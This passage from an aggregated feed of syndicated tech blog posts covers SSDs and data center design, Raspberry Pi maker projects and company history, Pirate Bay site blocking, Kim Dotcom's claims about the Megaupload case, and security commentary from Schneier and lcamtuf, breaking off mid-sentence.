The StorageTek was an SSD aimed at the IBM mainframe compatible market. The STC 4305 was seven times faster than IBM’s popular 2305 HDD system (and also about half the price). It consisted of a cabinet full of charge-coupled devices and cost $400,000 for 45MB capacity with throughput speeds up to 1.5 MB/sec.

SSDs are based on a type of non-volatile memory called NAND (named for the Boolean operator “NOT AND,” and one of two main types of flash memory). Flash memory stores data in individual memory cells, which are made of floating-gate transistors. Though they are semiconductor-based memory, they retain their information when no power is applied to them — a feature that’s obviously a necessity for permanent data storage.

Samsung SSD

Samsung SSD 850 Pro

Compared to an HDD, SSDs have higher data-transfer rates, higher areal storage density, better reliability, and much lower latency and access times. For most users, it’s the speed of an SSD that primarily attracts them. When discussing the speed of drives, what we are referring to is the speed at which they can read and write data.

For HDDs, the speed at which the platters spin strongly determines the read/write times. When data on an HDD is accessed, the read/write head must physically move to the location where the data was encoded on a magnetic section on the platter. If the file being read was written sequentially to the disk, it will be read quickly. As more data is written to the disk, however, it’s likely that the file will be written across multiple sections, resulting in fragmentation of the data. Fragmented data takes longer to read with an HDD as the read head has to move to different areas of the platter(s) to completely read all the data requested.

Because SSDs have no moving parts, they can operate at speeds far above those of a typical HDD. Fragmentation is not an issue for SSDs. Files can be written anywhere with little impact on read/write times, resulting in read times far faster than any HDD, regardless of fragmentation.

Samsung SSD 850 Pro (back)

Due to the way data is written and read to the drive, however, SSD cells can wear out over time. SSD cells push electrons through a gate to set its state. This process wears on the cell and over time reduces its performance until the SSD wears out. This effect takes a long time and SSDs have mechanisms to minimize this effect, such as the TRIM command. Flash memory writes an entire block of storage no matter how few pages within the block are updated. This requires reading and caching the existing data, erasing the block and rewriting the block. If an empty block is available, a write operation is much faster. The TRIM command, which must be supported in both the OS and the SSD, enables the OS to inform the drive which blocks are no longer needed. It allows the drive to erase the blocks ahead of time in order to make empty blocks available for subsequent writes.

The effect of repeated reading and erasing on an SSD is cumulative and an SSD can slow down and even display errors with age. It’s more likely, however, that the system using the SSD will be discarded for obsolescence before the SSD begins to display read/write errors. Hard drives eventually wear out from constant use as well, since they use physical recording methods, so most users won’t base their selection of an HDD or SSD drive based on expected longevity.

SSD internals

SSD circuit board

Overall, SSDs are considered far more durable than HDDs due to a lack of mechanical parts. The moving mechanisms within an HDD are susceptible to not only wear and tear over time, but to damage due to movement or forceful contact. If one were to drop a laptop with an HDD, there is a high likelihood that all those moving parts will collide, resulting in potential data loss and even destructive physical damage that could kill the HDD outright. SSDs have no moving parts so, while they hold the risk of a potentially shorter life span due to high use, they can survive the rigors we impose upon our portable devices and laptops.

What are the best uses for SSDs?

  • Notebooks, laptops, where performance, lightweight, areal storage density, resistance to shock and general ruggedness are desirable
  • Boot drives holding operating system and applications, which will speed up booting and application launching
  • Working files (media that is being edited: photos, video, audio, etc.)
  • Swap drives where SSD will speed up disk paging
  • Cache drives
  • Database servers
  • Revitalizing an older computer. If you’ve got a computer that seems slow to start up and slow to load applications and files, updating the boot drive with an SSD could make it seem, if not new, at least as if it just came back refreshed from spending some time on the beach.

Stay Tuned for Part 2 of HDD vs SSD

That’s it for part 1. In our second part we’ll take a deeper look at the differences between HDDs and SSDs, how both HDD and SSD technologies are evolving, and how Backblaze takes advantage of SSDs in our operations and data centers.

Here's a tip!Here’s a tip on finding all the posts tagged with SSD on our blog. Just follow https://www.backblaze.com/blog/tag/ssd/.

Don’t miss future posts on HDDs, SSDs, and other topics, including hard drive stats, cloud storage, and tips and tricks for backing up to the cloud. Use the Join button above to receive notification of future posts on our blog.

The post HDD vs SSD: What Does the Future for Storage Hold? appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Intimate Partner Threat

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/03/intimate_partne.html

Princeton’s Karen Levy has a good article computer security and the intimate partner threat:

When you learn that your privacy has been compromised, the common advice is to prevent additional access — delete your insecure account, open a new one, change your password. This advice is such standard protocol for personal security that it’s almost a no-brainer. But in abusive romantic relationships, disconnection can be extremely fraught. For one, it can put the victim at risk of physical harm: If abusers expect digital access and that access is suddenly closed off, it can lead them to become more violent or intrusive in other ways. It may seem cathartic to delete abusive material, like alarming text messages — but if you don’t preserve that kind of evidence, it can make prosecution more difficult. And closing some kinds of accounts, like social networks, to hide from a determined abuser can cut off social support that survivors desperately need. In some cases, maintaining a digital connection to the abuser may even be legally required (for instance, if the abuser and survivor share joint custody of children).

Threats from intimate partners also change the nature of what it means to be authenticated online. In most contexts, access credentials­ — like passwords and security questions — are intended to insulate your accounts against access from an adversary. But those mechanisms are often completely ineffective for security in intimate contexts: The abuser can compel disclosure of your password through threats of violence and has access to your devices because you’re in the same physical space. In many cases, the abuser might even own your phone — or might have access to your communications data because you share a family plan. Things like security questions are unlikely to be effective tools for protecting your security, because the abuser knows or can guess at intimate details about your life — where you were born, what your first job was, the name of your pet.

The Challenges of Opening a Data Center — Part 2

Post Syndicated from Roderick Bauer original https://www.backblaze.com/blog/factors-for-choosing-data-center/

Rows of storage pods in a data center

This is part two of a series on the factors that an organization needs to consider when opening a data center and the challenges that must be met in the process.

In Part 1 of this series, we looked at the different types of data centers, the importance of location in planning a data center, data center certification, and the single most expensive factor in running a data center, power.

In Part 2, we continue to look at factors that need to considered both by those interested in a dedicated data center and those seeking to colocate in an existing center.

Power (continued from Part 1)

In part 1, we began our discussion of the power requirements of data centers.

As we discussed, redundancy and failover is a chief requirement for data center power. A redundantly designed power supply system is also a necessity for maintenance, as it enables repairs to be performed on one network, for example, without having to turn off servers, databases, or electrical equipment.

Power Path

The common critical components of a data center’s power flow are:

  • Utility Supply
  • Generators
  • Transfer Switches
  • Distribution Panels
  • Uninterruptible Power Supplies (UPS)
  • PDUs

Utility Supply is the power that comes from one or more utility grids. While most of us consider the grid to be our primary power supply (hats off to those of you who manage to live off the grid), politics, economics, and distribution make utility supply power susceptible to outages, which is why data centers must have autonomous power available to maintain availability.

Generators are used to supply power when the utility supply is unavailable. They convert mechanical energy, usually from motors, to electrical energy.

Transfer Switches are used to transfer electric load from one source or electrical device to another, such as from one utility line to another, from a generator to a utility, or between generators. The transfer could be manually activated or automatic to ensure continuous electrical power.

Distribution Panels get the power where it needs to go, taking a power feed and dividing it into separate circuits to supply multiple loads.

A UPS, as we touched on earlier, ensures that continuous power is available even when the main power source isn’t. It often consists of batteries that can come online almost instantaneously when the current power ceases. The power from a UPS does not have to last a long time as it is considered an emergency measure until the main power source can be restored. Another function of the UPS is to filter and stabilize the power from the main power supply.

Data Center UPS

Data center UPSs

PDU stands for the Power Distribution Unit and is the device that distributes power to the individual pieces of equipment.


After power, the networking connections to the data center are of prime importance. Can the data center obtain and maintain high-speed networking connections to the building? With networking, as with all aspects of a data center, availability is a primary consideration. Data center designers think of all possible ways service can be interrupted or lost, even briefly. Details such as the vulnerabilities in the route the network connections make from the core network (the backhaul) to the center, and where network connections enter and exit a building, must be taken into consideration in network and data center design.

Routers and switches are used to transport traffic between the servers in the data center and the core network. Just as with power, network redundancy is a prime factor in maintaining availability of data center services. Two or more upstream service providers are required to ensure that availability.

How fast a customer can transfer data to a data center is affected by: 1) the speed of the connections the data center has with the outside world, 2) the quality of the connections between the customer and the data center, and 3) the distance of the route from customer to the data center. The longer the length of the route and the greater the number of packets that must be transferred, the more significant a factor will be played by latency in the data transfer. Latency is the delay before a transfer of data begins following an instruction for its transfer. Generally latency, not speed, will be the most significant factor in transferring data to and from a data center. Packets transferred using the TCP/IP protocol suite, which is the conceptual model and set of communications protocols used on the internet and similar computer networks, must be acknowledged when received (ACK’d) and requires a communications roundtrip for each packet. If the data is in larger packets, the number of ACKs required is reduced, so latency will be a smaller factor in the overall network communications speed.

Latency generally will be less significant for data storage transfers than for cloud computing. Optimizations such as multi-threading, which is used in Backblaze’s Cloud Backup service, will generally improve overall transfer throughput if sufficient bandwidth is available.

Those interested in testing the overall speed and latency of their connection to Backblaze’s data centers can use the Check Your Bandwidth tool on our website.
Data center telecommunications equipment

Data center telecommunications equipment

Data center under floor cable runs

Data center under floor cable runs


Computer, networking, and power generation equipment generates heat, and there are a number of solutions employed to rid a data center of that heat. The location and climate of the data center is of great importance to the data center designer because the climatic conditions dictate to a large degree what cooling technologies should be deployed that in turn affect the power used and the cost of using that power. The power required and cost needed to manage a data center in a warm, humid climate will vary greatly from managing one in a cool, dry climate. Innovation is strong in this area and many new approaches to efficient and cost-effective cooling are used in the latest data centers.

Switch's uninterruptible, multi-system, HVAC Data Center Cooling Units

Switch’s uninterruptible, multi-system, HVAC Data Center Cooling Units

There are three primary ways data center cooling can be achieved:

Room Cooling cools the entire operating area of the data center. This method can be suitable for small data centers, but becomes more difficult and inefficient as IT equipment density and center size increase.

Row Cooling concentrates on cooling a data center on a row by row basis. In its simplest form, hot aisle/cold aisle data center design involves lining up server racks in alternating rows with cold air intakes facing one way and hot air exhausts facing the other. The rows composed of rack fronts are called cold aisles. Typically, cold aisles face air conditioner output ducts. The rows the heated exhausts pour into are called hot aisles. Typically, hot aisles face air conditioner return ducts.

Rack Cooling tackles cooling on a rack by rack basis. Air-conditioning units are dedicated to specific racks. This approach allows for maximum densities to be deployed per rack. This works best in data centers with fully loaded racks, otherwise there would be too much cooling capacity, and the air-conditioning losses alone could exceed the total IT load.


Data Centers are high-security facilities as they house business, government, and other data that contains personal, financial, and other secure information about businesses and individuals.

This list contains the physical-security considerations when opening or co-locating in a data center:

Layered Security Zones. Systems and processes are deployed to allow only authorized personnel in certain areas of the data center. Examples include keycard access, alarm systems, mantraps, secure doors, and staffed checkpoints.

Physical Barriers. Physical barriers, fencing and reinforced walls are used to protect facilities. In a colocation facility, one customers’ racks and servers are often inaccessible to other customers colocating in the same data center.

Backblaze racks secured in the data center

Backblaze racks secured in the data center

Monitoring Systems. Advanced surveillance technology monitors and records activity on approaching driveways, building entrances, exits, loading areas, and equipment areas. These systems also can be used to monitor and detect fire and water emergencies, providing early detection and notification before significant damage results.

Top-tier providers evaluate their data center security and facilities on an ongoing basis. Technology becomes outdated quickly, so providers must stay-on-top of new approaches and technologies in order to protect valuable IT assets.

To pass into high security areas of a data center requires passing through a security checkpoint where credentials are verified.

Data Center security

The gauntlet of cameras and steel bars one must pass before entering this data center

Facilities and Services

Data center colocation providers often differentiate themselves by offering value-added services. In addition to the required space, power, cooling, connectivity and security capabilities, the best solutions provide several on-site amenities. These accommodations include offices and workstations, conference rooms, and access to phones, copy machines, and office equipment.

Additional features may consist of kitchen facilities, break rooms and relaxation lounges, storage facilities for client equipment, and secure loading docks and freight elevators.

Moving into A Data Center

Moving into a data center is a major job for any organization. We wrote a post last year, Desert To Data in 7 Days — Our New Phoenix Data Center, about what it was like to move into our new data center in Phoenix, Arizona.

Desert To Data in 7 Days — Our New Phoenix Data Center

Visiting a Data Center

Our Director of Product Marketing Andy Klein wrote a popular post last year on what it’s like to visit a data center called A Day in the Life of a Data Center.

A Day in the Life of a Data Center

Would you Like to Know More about The Challenges of Opening and Running a Data Center?

That’s it for part 2 of this series. If readers are interested, we could write a post about some of the new technologies and trends affecting data center design and use. Please let us know in the comments.

Here's a tip!Here’s a tip on finding all the posts tagged with data center on our blog. Just follow https://www.backblaze.com/blog/tag/data-center/.

Don’t miss future posts on data centers and other topics, including hard drive stats, cloud storage, and tips and tricks for backing up to the cloud. Use the Join button above to receive notification of future posts on our blog.

The post The Challenges of Opening a Data Center — Part 2 appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Petoi: a Pi-powered kitty cat

Post Syndicated from Alex Bate original https://www.raspberrypi.org/blog/petoi-a-pi-powered-kitty-cat/

A robot pet is the dream of many a child, thanks to creatures such as K9, Doctor Who’s trusted companion, and the Tamagotchi, bleeping nightmare of parents worldwide. But both of these pale in comparison (sorry, K9) to Petoi, the walking, meowing, live-streaming cat from maker Rongzhong Li.

Petoi: OpenCat Demo

Mentioned on IEEE Spectrum: https://spectrum.ieee.org/automaton/robotics/humanoids/video-friday-boston-dynamics-spotmini-opencat-robot-engineered-arts-mesmer-uncanny-valley More reads on Hackster: https://www.hackster.io/petoi/opencat-845129 优酷: http://v.youku.com/v_show/id_XMzQxMzA1NjM0OA==.html?spm=a2h3j.8428770.3416059.1 We are developing programmable and highly maneuverable quadruped robots for STEM education and AI-enhanced services. Its compact and bionic design makes it the only affordable consumer robot that mimics various mammal gaits and reacts to surroundings.


Not only have cats conquered the internet, they also have a paw firmly in the door of many makerspaces and spare rooms — rooms such as the one belonging to Petoi’s owner/maker, Rongzhong Li, who has been working on this feline creation since he bought his first Raspberry Pi.

Petoi Raspberry Pi Robot Cat

Petoi in its current state – apple for scale in lieu of banana

Petoi is just like any other housecat: it walks, it plays, its ribcage doubles as a digital xylophone — but what makes Petoi so special is Li’s use of the project as a platform for study.

I bought my first Raspberry Pi in June 2016 to learn coding hardware. This robot Petoi served as a playground for learning all the components in a regular Raspberry Pi beginner kit. I started with craft sticks, then switched to 3D-printed frames for optimized performance and morphology.

Various iterations of Petoi have housed various bits of tech, 3D-printed parts, and software, so while it’s impossible to list the exact ingredients you’d need to create your own version of Petoi, a few components remain at its core.

Petoi Raspberry Pi Robot Cat — skeleton prototype

An early version of Petoi, housed inside a plastic toy helicopter frame

A Raspberry Pi lives within Petoi and acts as its brain, relaying commands to an Arduino that controls movement. Li explains:

The Pi takes no responsibility for controlling detailed limb movements. It focuses on more serious questions, such as “Who am I? Where do I come from? Where am I going?” It generates mind and sends string commands to the Arduino slave.

Li is currently working on two functional prototypes: a mini version for STEM education, and a larger version for use within the field of AI research.

A cat and a robot cat walking upstairs Petoi Raspberry Pi Robot Cat

You can read more about the project, including details on the various interactions of Petoi, on the hackster.io project page.

Not quite ready to commit to a fully grown robot pet for your home? Why not code your own pixel pet with our free learning resource? And while you’re looking through our projects, check out our other pet-themed tutorials such as the Hamster party cam, the Infrared bird box, and the Cat meme generator.

The post Petoi: a Pi-powered kitty cat appeared first on Raspberry Pi.

The Pirate Bay’s Domain Suffers “40% Traffic Drop” After Dutch Blocking

Post Syndicated from Andy original https://torrentfreak.com/the-pirate-bays-domain-suffers-40-traffic-drop-after-dutch-blocking-180302/

Over the past several years, Dutch anti-piracy outfit BREIN has been engaged in continuous legal action against local ISPs Ziggo and XS4All. BREIN felt they should block The Pirate Bay to reduce copyright infringement but the ISPs felt blocking was disproportionate.

The case went all the way to the Supreme Court and then to the EU Court of Justice for clarification. Last June, the ECJ ruled that as a platform effectively communicating copyright works to the public, The Pirate Bay can indeed be blocked by ISPs.

The case will go back to the Supreme Court which is likely to give permanent blocking the go ahead. However, BREIN wanted a blocking decision more quickly and got one last September when The Hague Court of Appeal told Ziggo and XS4All to block The Pirate Bay pending a Supreme Court decision.

With The Pirate Bay blocked by the ISPs from September last year, BREIN has been monitoring the effect of the blockade on traffic to the site. In a statement, the anti-piracy outfit suggests that blocking is doing its job.

“Monitoring by ComScore shows that the number of unique visitors to thepiratebay.org from the Netherlands has dropped by more than 40% between September 2017 and December 2017 after internet providers Ziggo and XS4ALL were ordered by the court to demand access to the site on the basis of BREIN’s claim,” BREIN writes.

Ziggo is the largest cable operator in the Netherlands and XS4All one of the longest standing, so it comes as no surprise to learn that traffic to The Pirate Bay’s main domain has been hit. However, since the site can be accessed in numerous different indirect ways, including via proxies, mirrors and VPNs, to name a few, does BREIN’s claim that “blocking works” still hold water?

According to BREIN director Tim Kuik, yes it does.

“We also are blocking many proxies and mirrors. There is a whole list of them which also changes. New ones are added and others may be deleted,” Kuik informs TF.

“The monitoring compares like with like and shows a trend that correlates with other sources. I think this trend holds true for all blocked sites.”

So, to be clear, the 40% does not represent a drop in Dutch traffic to The Pirate Bay’s site and/or content overall, it only represents traffic which goes directly to the specific thepiratebay.org domain. Anyone circumventing the blockade isn’t counted.

Of course, that’s not to say that the overall traffic numbers from the Netherlands aren’t down as well, but there are no public figures to prove that one way or another. The precise impact of proxies and mirrors is also unclear but Kuik thinks that the blockades themselves send a message.

“Bypassing a blockade requires users to take action to illegally download and it is now clear that they are committing a criminal offense and most people do not want that,” he says.

VPNs are undoubtedly an effective unblocking solution for some but Kuik doesn’t believe they represent a big threat, currently at least.

“We think VPN use is not common under the average user, that is more something for the hardcore and not all of those will use it for access to illegal sources,” he informs TF.

While BREIN is fairly relaxed about VPNs for now, the group suggests it could take action if they begin to pose a risk to the site-blocking regime they’ve fought so hard for.

“If it becomes problematic, blocking could in principle also be demanded from VPN services,” Kuik warns.

Given the 40% figure and the caveats above, it is likely that the direct traffic figure to The Pirate Bay’s domain will fall again in the months to come. Mid-January a Dutch court ruled that local Internet providers KPN, Tele2, T-Mobile, Zeelandnet and CAIW must follow Ziggo and XS4All by also blocking The Pirate Bay.

There’s no doubt that blocking has at least some effect on direct traffic to pirate sites and it’s clear that entertainment industry groups feel it’s essential as part of a bigger anti-piracy toolkit.

Thus far, however, pirates have proven to be extremely resilient so the Netherlands will probably need further action against a much broader range of sites if blocking is to have any meaningful effect.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons

Simulate sand with Adafruit’s newest project

Post Syndicated from Alex Bate original https://www.raspberrypi.org/blog/simulate-sand-with-adafruits-newest-project/

The Ruiz brothers at Adafruit have used Phillip Burgess’s PixieDust code to turn a 64×64 LED Matrix and a Raspberry Pi Zero into an awesome sand toy that refuses to defy the laws of gravity. Here’s how to make your own.

BIG LED Sand Toy – Raspberry Pi RGB LED Matrix

Simulated LED Sand Physics! These LEDs interact with motion and looks like they’re affect by gravity. An Adafruit LED matrix displays the LEDs as little grains of sand which are driven by sampling an accelerometer with Raspberry Pi Zero!

Obey gravity

As the latest addition to their online learning system, Adafruit have produced the BIG LED Sand Toy, or as I like to call it, Have you seen this awesome thing Adafuit have made?

Adafruit Sand Toy Raspberry Pi

The build uses a Raspberry Pi Zero, a 64×64 LED matrix, the Adafruit RGB Matrix Bonnet, 3D-printed parts, and a few smaller peripherals. Find the entire tutorial, including downloadable STL files, on their website.

How does it work?

Alongside the aforementioned ingredients, the project utilises the Adafruit LIS3DH Triple-Axis Accelerometer. This sensor is packed with features, and it allows the Raspberry Pi to control the virtual sand depending on how the toy is moved.

Adafruit Sand Toy Raspberry Pi

The Ruiz brothers inserted an SD card loaded with Raspbian Lite into the Raspberry Pi Zero, installed the LED Matrix driver, cloned the Adafruit_PixieDust library, and then just executed the code. They created some preset modes, but once you’re comfortable with the project code, you’ll be able to add your own take on the project.

Accelerometers and Raspberry Pi

This isn’t the first time a Raspberry Pi has met an accelerometer: the two Raspberry Pis aboard the International Space Station for the Astro Pi mission both have accelerometers thanks to their Sense HATs.

Comprised of a bundle of sensors, an LED matrix, and a five-point joystick, the Sense HAT is a great tool for exploring your surroundings with the Raspberry Pi, as well as for using your surroundings to control the Pi. You can find a whole variety of Sense HAT–based projects and tutorials on our website.

Raspberry Pi Sense HAT Slug free resource

And if you’d like to try out the Sense HAT, including its onboard accelerometer, without purchasing one, head over to our online emulator, or use the emulator preinstalled on Raspbian.

The post Simulate sand with Adafruit’s newest project appeared first on Raspberry Pi.

Russians Hacked the Olympics

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/03/russians_hacked.html

Two weeks ago, I blogged about the myriad of hacking threats against the Olympics. Last week, the Washington Post reported that Russia hacked the Olympics network and tried to cast the blame on North Korea.

Of course, the evidence is classified, so there’s no way to verify this claim. And while the article speculates that the hacks were a retaliation for Russia being banned due to doping, that doesn’t ring true to me. If they tried to blame North Korea, it’s more likely that they’re trying to disrupt something between North Korea, South Korea, and the US. But I don’t know.

Dotcom: Obama Admitted “Mistakes Were Made” in Megaupload Case

Post Syndicated from Andy original https://torrentfreak.com/dotcom-obama-admitted-mistakes-were-made-in-megaupload-case-180301/

When Megaupload was forcefully shut down in 2012, it initially appeared like ‘just’ another wave of copyright enforcement action by US authorities.

When additional details began to filter through, the reality of what had happened was nothing short of extraordinary.

Not only were large numbers of Megaupload servers and millions of dollars seized, but Kim Dotcom’s home in New Zealand was subjected to a military-style raid comprised of helicopters and dozens of heavily armed special tactics police. The whole thing was monitored live by the FBI.

Few people who watched the events of that now-infamous January day unfold came to the conclusion this was a routine copyright-infringement case. According to Kim Dotcom, whose life had just been turned upside down, something of this scale must’ve filtered down from the very top of the US government. It was hard to disagree.

At the time, Dotcom told TorrentFreak that then-Vice President Joe Biden directed attorney Neil MacBride to target the cloud storage site and ever since the Megaupload founder has leveled increasingly serious allegations at officials of the former government of Barack Obama.

For example, Dotcom says that since the US would have difficulty gaining access to him in his former home of Hong Kong, the government of New Zealand was persuaded to welcome him in, knowing they would eventually turn him over to the United States. More recently he’s been turning up the pressure again, such as a tweet on February 20th which cast more light on that process.

“Joe Biden had a White House meeting with an ‘extradition expert’ who worked for Hong Kong police and a handful of Hollywood executives to discuss my case. A week prior to this meeting Neil MacBride hand-delivered his action plan to Biden’s chief of staff, also at the White House,” Dotcom wrote.

But this claim is just the tip of an extremely large iceberg that’s involved illegal spying on Dotcom in New Zealand and a dizzying array of legal battles that are set to go on for years to come. But perhaps of most interest now is that rather than wilting away under the pressure, Dotcom appears to be just warming up.

A few hours ago Dotcom commented on an article published in The Hill which revealed that Barack Obama will visit New Zealand in March, possibly to celebrate the opening of Air New Zealand’s new route to the U.S.

Rather than expressing disappointment, the Megaupload founder seemed pleased that the former president would be touching down next month.

“Great. I’ll have a Court subpoena waiting for him in New Zealand,” Dotcom wrote.

But that was just a mere hors d’oeuvre, with the main course was yet to come. But come it did.

“A wealthy Asian Megaupload shareholder hired a friend of the Obamas to enquire about our case. This person was recommended by a member of the Chinese politburo ‘if you want to get to Obama directly’. We did,” Dotcom revealed.

Dotcom says he’ll release a transcript detailing what Obama told his friend on March 21 when Obama arrives in town but in the meantime, he offered another little taster.

“Mistakes were made. It hasn’t gone well,” Obama reportedly told the person reporting back to Megaupload. “It’s a problem. I’ll see to it after the election.”

Of course, Obama’s position after the election was much different to what had gone before, but that didn’t stop Dotcom’s associates infiltrating the process aimed at keeping the Democrats in power.

“Our friendly Obama contact smuggled an @EFF lawyer into a re-election fundraiser hosted by former Vice President Joe Biden,” he revealed.

“When Biden was asked about the Megaupload case he bragged that it was his case and that he ‘took care of it’,” which is what Dotcom has been claiming all along.

On March 21, when Obama lands in New Zealand, Dotcom says he’ll be waiting.

“I’m looking forward to @BarackObama providing some insight into the political dimension of the Megaupload case when he arrives in the New Zealand jurisdiction,” he teased.

Better get the popcorn ready….

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons

Happy birthday to us!

Post Syndicated from Eben Upton original https://www.raspberrypi.org/blog/happy-birthday-2018/

The eagle-eyed among you may have noticed that today is 28 February, which is as close as you’re going to get to our sixth birthday, given that we launched on a leap day. For the last three years, we’ve launched products on or around our birthday: Raspberry Pi 2 in 2015; Raspberry Pi 3 in 2016; and Raspberry Pi Zero W in 2017. But today is a snow day here at Pi Towers, so rather than launching something, we’re taking a photo tour of the last six years of Raspberry Pi products before we don our party hats for the Raspberry Jam Big Birthday Weekend this Saturday and Sunday.


Before there was Raspberry Pi, there was the Broadcom BCM2763 ‘micro DB’, designed, as it happens, by our very own Roger Thornton. This was the first thing we demoed as a Raspberry Pi in May 2011, shown here running an ARMv6 build of Ubuntu 9.04.

BCM2763 micro DB

Ubuntu on Raspberry Pi, 2011-style

A few months later, along came the first batch of 50 “alpha boards”, designed for us by Broadcom. I used to have a spreadsheet that told me where in the world each one of these lived. These are the first “real” Raspberry Pis, built around the BCM2835 application processor and LAN9512 USB hub and Ethernet adapter; remarkably, a software image taken from the download page today will still run on them.

Raspberry Pi alpha board, top view

Raspberry Pi alpha board

We shot some great demos with this board, including this video of Quake III:

Raspberry Pi – Quake 3 demo

A little something for the weekend: here’s Eben showing the Raspberry Pi running Quake 3, and chatting a bit about the performance of the board. Thanks to Rob Bishop and Dave Emett for getting the demo running.

Pete spent the second half of 2011 turning the alpha board into a shippable product, and just before Christmas we produced the first 20 “beta boards”, 10 of which were sold at auction, raising over £10000 for the Foundation.

The beginnings of a Bramble

Beta boards on parade

Here’s Dom, demoing both the board and his excellent taste in movie trailers:

Raspberry Pi Beta Board Bring up

See http://www.raspberrypi.org/ for more details, FAQ and forum.


Rather to Pete’s surprise, I took his beta board design (with a manually-added polygon in the Gerbers taking the place of Paul Grant’s infamous red wire), and ordered 2000 units from Egoman in China. After a few hiccups, units started to arrive in Cambridge, and on 29 February 2012, Raspberry Pi went on sale for the first time via our partners element14 and RS Components.

Pallet of pis

The first 2000 Raspberry Pis

Unboxing continues

The first Raspberry Pi from the first box from the first pallet

We took over 100000 orders on the first day: something of a shock for an organisation that had imagined in its wildest dreams that it might see lifetime sales of 10000 units. Some people who ordered that day had to wait until the summer to finally receive their units.


Even as we struggled to catch up with demand, we were working on ways to improve the design. We quickly replaced the USB polyfuses in the top right-hand corner of the board with zero-ohm links to reduce IR drop. If you have a board with polyfuses, it’s a real limited edition; even more so if it also has Hynix memory. Pete’s “rev 2” design made this change permanent, tweaked the GPIO pin-out, and added one much-requested feature: mounting holes.

Revision 1 versus revision 2

If you look carefully, you’ll notice something else about the revision 2 board: it’s made in the UK. 2012 marked the start of our relationship with the Sony UK Technology Centre in Pencoed, South Wales. In the five years since, they’ve built every product we offer, including more than 12 million “big” Raspberry Pis and more than one million Zeros.

Celebrating 500,000 Welsh units, back when that seemed like a lot

Economies of scale, and the decline in the price of SDRAM, allowed us to double the memory capacity of the Model B to 512MB in the autumn of 2012. And as supply of Model B finally caught up with demand, we were able to launch the Model A, delivering on our original promise of a $25 computer.

A UK-built Raspberry Pi Model A

In 2014, James took all the lessons we’d learned from two-and-a-bit years in the market, and designed the Model B+, and its baby brother the Model A+. The Model B+ established the form factor for all our future products, with a 40-pin extended GPIO connector, four USB ports, and four mounting holes.

The Raspberry Pi 1 Model B+ — entering the era of proper product photography with a bang.

New toys

While James was working on the Model B+, Broadcom was busy behind the scenes developing a follow-on to the BCM2835 application processor. BCM2836 samples arrived in Cambridge at 18:00 one evening in April 2014 (chips never arrive at 09:00 — it’s always early evening, usually just before a public holiday), and within a few hours Dom had Raspbian, and the usual set of VideoCore multimedia demos, up and running.

We launched Raspberry Pi 2 at the start of 2015, pairing BCM2836 with 1GB of memory. With a quad-core Arm Cortex-A7 clocked at 900MHz, we’d increased performance sixfold, and memory fourfold, in just three years.

Nobody mention the xenon death flash.

And of course, while James was working on Raspberry Pi 2, Broadcom was developing BCM2837, with a quad-core 64-bit Arm Cortex-A53 clocked at 1.2GHz. Raspberry Pi 3 launched barely a year after Raspberry Pi 2, providing a further doubling of performance and, for the first time, wireless LAN and Bluetooth.

All our recent products are just the same board shot from different angles

Zero to hero

Where the PC industry has historically used Moore’s Law to “fill up” a given price point with more performance each year, the original Raspberry Pi used Moore’s law to deliver early-2000s PC performance at a lower price. But with Raspberry Pi 2 and 3, we’d gone back to filling up our original $35 price point. After the launch of Raspberry Pi 2, we started to wonder whether we could pull the same trick again, taking the original Raspberry Pi platform to a radically lower price point.

The result was Raspberry Pi Zero. Priced at just $5, with a 1GHz BCM2835 and 512MB of RAM, it was cheap enough to bundle on the front of The MagPi, making us the first computer magazine to give away a computer as a cover gift.

Cheap thrills

MagPi issue 40 in all its glory

We followed up with the $10 Raspberry Pi Zero W, launched exactly a year ago. This adds the wireless LAN and Bluetooth functionality from Raspberry Pi 3, using a rather improbable-looking PCB antenna designed by our buddies at Proant in Sweden.

Up to our old tricks again

Other things

Of course, this isn’t all. There has been a veritable blizzard of point releases; RAM changes; Chinese red units; promotional blue units; Brazilian blue-ish units; not to mention two Camera Modules, in two flavours each; a touchscreen; the Sense HAT (now aboard the ISS); three compute modules; and cases for the Raspberry Pi 3 and the Zero (the former just won a Design Effectiveness Award from the DBA). And on top of that, we publish three magazines (The MagPi, Hello World, and HackSpace magazine) and a whole host of Project Books and Essentials Guides.

Chinese Raspberry Pi 1 Model B

RS Components limited-edition blue Raspberry Pi 1 Model B

Brazilian-market Raspberry Pi 3 Model B

Visible-light Camera Module v2

Learning about injection moulding the hard way

250 pages of content each month, every month

Essential reading

Forward the Foundation

Why does all this matter? Because we’re providing everyone, everywhere, with the chance to own a general-purpose programmable computer for the price of a cup of coffee; because we’re giving people access to tools to let them learn new skills, build businesses, and bring their ideas to life; and because when you buy a Raspberry Pi product, every penny of profit goes to support the Raspberry Pi Foundation in its mission to change the face of computing education.

We’ve had an amazing six years, and they’ve been amazing in large part because of the community that’s grown up alongside us. This weekend, more than 150 Raspberry Jams will take place around the world, comprising the Raspberry Jam Big Birthday Weekend.

Raspberry Pi Big Birthday Weekend 2018. GIF with confetti and bopping JAM balloons

If you want to know more about the Raspberry Pi community, go ahead and find your nearest Jam on our interactive map — maybe we’ll see you there.

The post Happy birthday to us! appeared first on Raspberry Pi.

Getting product security engineering right

Post Syndicated from Michal Zalewski original http://lcamtuf.blogspot.com/2018/02/getting-product-security-engineering.html

Product security is an interesting animal: it is a uniquely cross-disciplinary endeavor that spans policy, consulting,
process automation, in-depth software engineering, and cutting-edge vulnerability research. And in contrast to many
other specializations in our field of expertise – say, incident response or network security – we have virtually no
time-tested and coherent frameworks for setting it up within a company of any size.

In my previous post, I shared some thoughts
on nurturing technical organizations and cultivating the right kind of leadership within. Today, I figured it would
be fitting to follow up with several notes on what I learned about structuring product security work – and about actually
making the effort count.

The “comfort zone” trap

For security engineers, knowing your limits is a sought-after quality: there is nothing more dangerous than a security
expert who goes off script and starts dispensing authoritatively-sounding but bogus advice on a topic they know very
little about. But that same quality can be destructive when it prevents us from growing beyond our most familiar role: that of
a critic who pokes holes in other people’s designs.

The role of a resident security critic lends itself all too easily to a sense of supremacy: the mistaken
belief that our cognitive skills exceed the capabilities of the engineers and product managers who come to us for help
– and that the cool bugs we file are the ultimate proof of our special gift. We start taking pride in the mere act
